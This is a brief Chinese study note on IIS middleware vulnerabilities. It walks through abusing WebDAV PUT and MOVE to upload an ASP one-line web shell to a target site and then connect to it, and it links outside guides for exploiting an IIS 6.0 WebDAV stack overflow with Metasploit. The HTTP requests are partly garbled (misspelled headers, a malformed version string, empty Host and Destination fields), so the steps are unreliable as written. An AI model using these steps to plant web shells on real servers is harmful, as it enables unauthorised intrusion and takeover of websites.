中间件漏洞学习

=================================IIS 写权限漏洞===========================================

前提：1.OPTIONS 方式查看网站是否开启了 PUT MOVE 的请求方式。

服务器开启了webdav的组件（导致的可以扫描到当前的操作）

0X01:  目标url ： http://www.a.com

0X02:  以 PUT方式请求 http://www.a.com

          PUT /1.txt //HTTP1.0

          Host: http://www.a.com

          Content-Lengh:24

          <%eval reqursr （"MH"）>

0X03：成功返回 200 状态码后    再次访问http://www.a.com/1.txt   

          MOVE /1.txt //HTTP1.0

          Host:

          Destination:

0x04:  连接 http://www.a.com/shell.asp
===================================IIS6.0 栈溢出===============================================   

    前提：WebDAV设置为Allow，Webcleint为启用

    原理&利用：https://bbs.pediy.com/thread-216967.htm

    kali MSF 利用： https://blog.csdn.net/zzxx123520/article/details/79156637